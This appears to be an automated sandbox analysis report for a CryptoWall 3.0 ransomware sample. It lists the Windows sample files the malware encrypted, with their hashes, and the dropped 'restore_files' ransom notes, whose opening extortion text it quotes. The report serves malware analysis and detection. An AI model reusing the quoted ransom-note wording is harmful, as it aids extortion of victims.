                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):879822
                                                                                                                          Entropy (8bit):7.999783565202353
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:24576:56jGwk4eMjnsZbcdSzjiV8ZptChrFwwXZKyHQ6M:MX79zsZbcMIowrKOmX
                                                                                                                          MD5:98D1DD45E84C2277FAD0EB8368A2CE0A
                                                                                                                          SHA1:82C9691BB6AEE61B8025EDD6E25082BFA0C6D8A4
                                                                                                                          SHA-256:8B4D65308DAAD24E20D4433595867D645C5BC64F8EF1D4B069FE8ABDACE4DBA8
                                                                                                                          SHA-512:3040B0E653477EF46457EFB9B8509F606D25584EE2980722FE2146FA8FF8BABC540200B03D5046C4E558853E7A61DBB574EDA9DB98FE4CEE6690A791B7B63A58
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..>!.(D..t0>.9.._"k...*.0Msx.K.E.,\..=..c.........1.f..V....J.X.0...Xf.<P.1R.S.BC...L.?..6.$\....7...Ss.D..C.1..n.wm..9.9?.m.:..NW.g.g..}../n9.}.6A..w.X.......zy..}$..q..W}'d;)..~X..)D..*9.C.p..A....\r}..$..X.....i.....T5...:Z..{....b....P......?.~m..9.\.Jg&ii!...K_eZ.. ..-.'9v..p..]vz...1.z..h.ow.;!.....M...DT..z......^.yA.8.R.#....jS..M..$...2.(....r.D..D...._.[z<..X.-X.......F.#c..G..o..x.#...3Is..$..(8..cA3f.....F.mz.~......m...5.*..X.\....H.........J.j.BnV.....w.....k+p.*A7...U.E..o..J.dq<.Y.@...e..D<..U..._............o:...E..`..A....\..6..k29......N.TA.F...a.......

                                                                                                                          C:\Users\Public\Pictures\Sample Pictures\Desert.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):846366
                                                                                                                          Entropy (8bit):7.999816925536536
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:24576:tVE53K42nu8FLFM/WyZdxqniAexD8OAvl6U0Y:oa434GlqniAe58OqL
                                                                                                                          MD5:984F5F4321D6FD7BC9419E24060D15A0
                                                                                                                          SHA1:62F2F6C3887CFBB2BAF3E98138C03E22C5C8622C
                                                                                                                          SHA-256:271C10D65657D042D0822C9530DE1D8489171C6EF33089024FC61B62AC5E8AC9
                                                                                                                          SHA-512:89C764D416E4A02840E155DD6913C4CF9F54C689D88E5C3253C4E3C2E8C1B8217CFE4DF59D80D0B8E946A3E8789727128B87498A69BA5CC111E5E82D3C7D4573
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...4o...x~.8.`....u.......&..HS......z.-Ek....y.....H*d.<..........=&.....[...........k.6....=..k*...9..<..Jn....DMl.=.!I9..Q...o.\..1SJ.....Zz..Le.....EC{.....`..O..XQp:..$..*.\......R..e..YIL8N .....(.,.M..{..*..t.&2.K.a.9.....G...Rr....k'....u.B....R.W..+LL.G..-......x..A.....Z5...t;s.y.3.C....URR.....L.]......G4.G./\.....[.......AP..Y........q.....a...K..F......X)R.Zn...........`./..7.....Fe....,....2\...".[.N..b.?..L!G,../.'....1........BI-B....].`....?.....o.i.......v".Ri....GZ*.2.YTz.l.c......0....;....=.......m...b..T..G.A..u...$6./....FF........er.s..q

                                                                                                                          C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):596126
                                                                                                                          Entropy (8bit):7.999628599330229
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:oEcuRGrVjPy7PM2q+xCorpiDwhQV6Nb3HIDFKubFZ2vuQzgYx:TcuRwVjPyzMxrOpiDwhpNbeFxI
                                                                                                                          MD5:C29B66447212572A9F0ACF11D2DB0229
                                                                                                                          SHA1:E55C867AE6B8B28FB1895E45D1606062F53C06F5
                                                                                                                          SHA-256:205BE3BE3BEC79F058B746ACB7D9C5C6B5DF6A7238ED31F16E5805BBC9FE050A
                                                                                                                          SHA-512:6E131BA63E6E8C77A981301F20E78384A99C73B53D7D3050D48B92356C0449D6972DEC1D571E64C747AC008D196E37574BD5E3A34ECFD3B41F197F0DB8C7EE0F
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....3QwgR3.@..]..................6*....:^.O..9...G...._ >.6.$..d......>.....|.l6)...Y.{Jx.....3....%...c.9).:..R...$E.W.......5.dN.,.L/...Ua..[.f.......#,....f...W...."...9C.m..".....>AJ.E.....p.WN.[=....b....g.......g.Z..::.....=ao8g..@.q..J_o6.H..7".c.;.j..,]....U.u9f!W.a...%.6...Y/.....7|..Om.Q..y.....u.5...F....p..k........;...~0.%.,.m....E...n.Me..Pi...6bN..}~.....O.8..i.m....O(.H~.(g..m...8.>l'.p..Y...z.....!..rC..z.L......88....0`..."....|.$m.$XJ..l..k.0..E(.....,..T..G.@.A]........iz).?w1.@ .......=./'...h........@._",.......pYm...&Z...Qn..8:^.#.Y.V.%.d..*.w.....

                                                                                                                          C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):776542
                                                                                                                          Entropy (8bit):7.999757453156257
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:idKFI8B65Kr43g/B38bUiZT4oC6zyZWdnU4jYAzrasCC1lnkpxLn8ymD6Pnuaxtf:jIk4utSUiVk2yZWtU4jYAf31JkpxLRzx
                                                                                                                          MD5:BC5C99A91004E1E4FEFB21A10DFC9539
                                                                                                                          SHA1:E618E84817C835D02CABCEFFD5DB44C5D4C007B9
                                                                                                                          SHA-256:B3D8FF8168DFDDC6204F70E310A778AF13EA509BF9B1AEFF059D35BD15E1441D
                                                                                                                          SHA-512:9B05A6260C18779C0ACDC78BE379C0B05794CDA2BFEA48FBE6493E4076079FAB562FD0F652519CF613227BD687A6971E7535EADFEF48F6A9F2350357BFDBFF53
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..H.kc....n.............6x.B......q...t+....... .....p...c-..v.by..mk.D.bc.^.A.M.z.|....."...Q.....{9]ZL@.Z..i.^.-....8.Y[b.L..wa[>>%b.......[.N..a{}A..V.... ..v+..........o|..\..#_....+.....<.....u....o7.x....0nU..+...0...'......../5...f.M...Wn.Q..U...."?....G... ....cn.J...jE.vNP...\3Qt.n.t...z...Z..C..)...pud6.6.MHpW.5.CI........?\........RN.l.JP.....tC.VU.."%:q.f...{..>.jR.*~.G.uX.........e.....I.+..n\%.Boy..N.;.p........^..n.5. .|..4..8l.....=.,..7.~.3.....(.8).fz~=.p?.*6...0.x...Bw'...f...2...n..A....@^.x.y>zK...eC..(.^.l.vl^....7....*#.8.;%.0U.....a..r..Y....l*.l.s

                                                                                                                          C:\Users\Public\Pictures\Sample Pictures\Koala.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):781246
                                                                                                                          Entropy (8bit):7.999766644859161
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:jNioPVwKs/rnvjd5o41dPCAwkNNkQB7jXiuyMrnu87qRq96zULi3BmSu7isT6k7:5Vz4jduoKdqkQB75yib2I64Lywbv7
                                                                                                                          MD5:20E6A91B207ACECF2E0108AFF9D933F0
                                                                                                                          SHA1:2DDDE51695BEF1E15C579F760937266648F0186B
                                                                                                                          SHA-256:48E1EADCFFB8DDE517E10E8B9F7E741827638380B86F1D06F9BEA4D99588A1E8
                                                                                                                          SHA-512:F3757D5C530DE116197385BAD68F1F6EAF3031784F2DDE0CBB929AEEDBC68F14D1C13D7EF010A572D8892FF0F46CEDDAC1B5DC850DDC6145860ABFC17AEC392D
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...u....E..B..K.........5....u..2Y`....8_......~..}C_...V..P.e).....$v.R.q.@M......N.xbb~..!Vx.Z.d...p4.'/mMj...)..tw....*+.x....`.&F..Q."...:...S.M/[...b........W..s.S.E;....vu.U...A..R.y..Q..S.#..=.Vc.a..w.....e,59.r.YS%.2[M......*...+'.4s!..O..20.I.5.u$.r.._y..xE....^.x...NS...x.....-..j'..[a(....d>.....z.E.\.*...i........+N.y.4....T...........GOgt]......D.xu%.&+.6.x..A<.m........=.]...?b...n.&r....q.@..g.c.....4..1L..3}..."...Vq...o.I..Z.. [..#...........`..qf.A....,..9,....D...}..5.........r*.....&K..T.7......mM..*...x....%.z...ok.Geh...4..h.Yn..?%.I."d.V..m.$...fpR.'$

                                                                                                                          C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):562110
                                                                                                                          Entropy (8bit):7.999634521097577
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:FyGp41iRFEWOg9WFDxziFy9C6Jn+nrvQYSunCnQcHvzJz8GQXfv8G:Fy241euYUFDNic9Czro1QHh
                                                                                                                          MD5:C50F1D1AE37CAC1671FAC9712AA9E0A4
                                                                                                                          SHA1:5A8176A1A84E7D3945D5AB8F65A64FAB0CFE5366
                                                                                                                          SHA-256:419DFC785D372006C4F5081E2E13984F5CFB329EC9755C52524B598D4B8BAD28
                                                                                                                          SHA-512:59A87153AD051A4A1FFE28C47AF9024AAC74B6EF36C1A417EB484CE7C6A5269AA7E6FBA3E657311D9A04CC562B7209BAC480B8F96205C5B2A989C17974816DDC
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..Z.&N.X..h..............`/.1.6...LL.P.6.S.!S-| ....-w.q.-..j.g...]%.Rgl.w.Fq.k..I.tuD..+y;.t..].W.,m..<|../..Op..^H..4.. 8..r....._m.....^....e.W[5.J...nq1......n..5..#..61....Q.C...).../ ....P5....G./]1....s......T.i{1}.=.n...zE.p.e`Jj.. =....x..H.U.f8..I..O.&..@.H.P]."..k..R.$i1..T.....`D..8.R........./........%V0~'....'.[.B..A.=...h...[.<a..:.vQU-S.....-.LR..E..s.....*.*.'......s.e.Q....&3c..#....uC...<..).M.-I..&..;....~.<..j.8...............E..sD+..`_S.d.0>.........{.....w|....lN......+.eX.....I..k5M...}....e.Z..Fw....W.C..FU...M..]}...k."........Q!.)

                                                                                                                          C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):778670
                                                                                                                          Entropy (8bit):7.9997883961911445
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:AJhQRt/1MQJfwUL3pPOO8rpzpkuvHQuj9jEEkW2apGWnYLEd0An3L+yCtc5r:QQzWslzpJ8rpz66j9wEkxmG3LEd0G36S
                                                                                                                          MD5:B1EA50F874E0B9DB9A7ADD1DD86A3B34
                                                                                                                          SHA1:A7A7E49BCCE680D0FF5C940E9584C308B6D05128
                                                                                                                          SHA-256:ACC54ACE830C307BABCF47B108685425CFF3285F30E193D4315E37F816BCEB8E
                                                                                                                          SHA-512:22F32BDB3C3E6C717C5689E0E4D223E0AC4F3B123E122F292826F686417DED6C70AD75B79995260164434780B6A13D53E83D6159706E597E51EAA519EE0BA1EF
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..^../a."..?..r.F*......D%.....lp..z.X./.sR..k...)g..DV....,_..#J....k..F..3(...f..b+.\S.B...E{....b.}a..|e.. .Y,.lIh+IX..b..?..@O..Z.e.....l..#..O.p...".2.i.S.fd#......n..A+..O.1.Vu,..........}9.nc7.&............8J..ek.XzW8...5O&..........LP):.Z.kS...n...3....Yh..z...........M.z..].)...4c .6....x._s.ho.t.v2.G;Qbt...X......w...K..;....n.5.1xF...+\T./...c.O.......}.cr<.....\.FQ.l.5.F(......hL...qFn.K...1;..J.s.O..0.r4...QX...P..~..$..yj..$....#".rA....9..c2j..%?<.R.X.\3.Y-.....>.....A........8..V ....s..H..v<s..h...v.h..c.{y.....h.x%...!0O.-.O.>q....N<....M..O..$.

                                                                                                                          C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):621310
                                                                                                                          Entropy (8bit):7.999728563888484
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:pBEatWD9X+1PsYfxEwq02yCSBWttKkCQPA0jdNeWWSp:p+qsISyIttdy0JNUSp
                                                                                                                          MD5:03A547178ABC50C4502B8265B53DAFC1
                                                                                                                          SHA1:FCDDCD13F25F29C18712E6849DAC13E7EA97C05A
                                                                                                                          SHA-256:0756F3755A217D95D1EE71BE34C9EAB318FB0785F4A8E9E400E4F7573EC5D266
                                                                                                                          SHA-512:EF6B97AAE33B312A891B2ECDA0C54F7C2655F1329EED583194C0C9062889EAE2F9BF93BD6FAE31D64055AA6EE081223DB2ACB915316CFA2A524FAF7999C2ADC1
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...k+pw..P.y.[A.u.Xy....._2G..[y.P...M..rOS....J....U.^C...;.l..7.t..F...z...v>.T/..E...7..aj,I,-..?.s .V.np.O...>>.|..U.*...`.$]5....w....).M....}..j$..BI2..X...c..Y.m.$.i..e...#.G...=0....W..i.^..ndcQ2...........KOk.Bc...QlO.>..5o4..1..d...g.N...q.w.;6Jw.}...#..,..7..ri.8..]......P.u...IY..cp.E...8p....Qw].".sg....5.6v1F.;...1v.a.....+....:..).....2...x..]3F..<P..u..$...%+.Y..A....b.?.......;...r|.... SU....Q..X.` ..."?$ji...8.#.R.*].:...g..B.N.....(...p.g^1.v>GK{e.#...%X$.J-_..qY=$w....u.z.}..IFY...\.V..tR.Q.r.....Z........X.@L2|.[.g.A.>....=.@.O.o.e.cQ..

                                                                                                                          C:\Users\Public\Pictures\Sample Pictures\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\Public\Pictures\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\Public\Pictures\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\Public\Videos\Sample Videos\Wildlife.wmv

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26246446
                                                                                                                          Entropy (8bit):7.999993560462748
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:786432:U3PHUYS9v+iwKXDb6X1uAgSAtNulQGOiXGIiMR:U3PHU9v+CQuALAtNuMiX3R
                                                                                                                          MD5:ED25D6F9CE26EA23F803DA52D642EEE7
                                                                                                                          SHA1:AEBA4000CBD2867B788D95AB51342E23A7819B88
                                                                                                                          SHA-256:DD9925281A2E17409C59EECE3088A9D0934D51AA0D29B8F51939E6EE40024A4C
                                                                                                                          SHA-512:4F40B4E818B08254737F45CC9F370CCCDB8B3426DC1A7D629853B580921EBDBA85FE753F288E3F79323EE6ACD4A3D427C2E0B49DD5281962E8C3D6FFAD40D1E5
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....I...b.q.. Q..{...._..`...(@:.nk.G.K..o....>....*H.kH,.m.....V[.....3i'.+:.Eca.....A.j.G...Z=..eR..k/.F'd-.C.(.@I.,v...X...}p`.M..f0..8.+..g..j..........b<'dC9........|;9,>. ,.8.............D..&k.<..7uW.l.L..3...B.#L.N.M.........hg.. .....JZ.^...GJ..}..)....FA2k.q..4.)X..5.H^)..+B.>9..]g.7j.c.aI......wsC.]B2w.\..j^7...-...4....A..9...TC...;........-Vs.!..`.s..q.....^C0...w..g5.ztW...a@..'....oLb<i.jJ....{..7..G5 1.ka...DB..8...03E.o.w.}..h)LJPy8....`.=..~....)J.*...`.....W.po.........G-.....v...&8..4.u..l.h....H....... ...3.{Y...x.L3.'.....%...L,2...+^........Y.....Y.

                                                                                                                          C:\Users\Public\Videos\Sample Videos\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\Public\Videos\Sample Videos\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
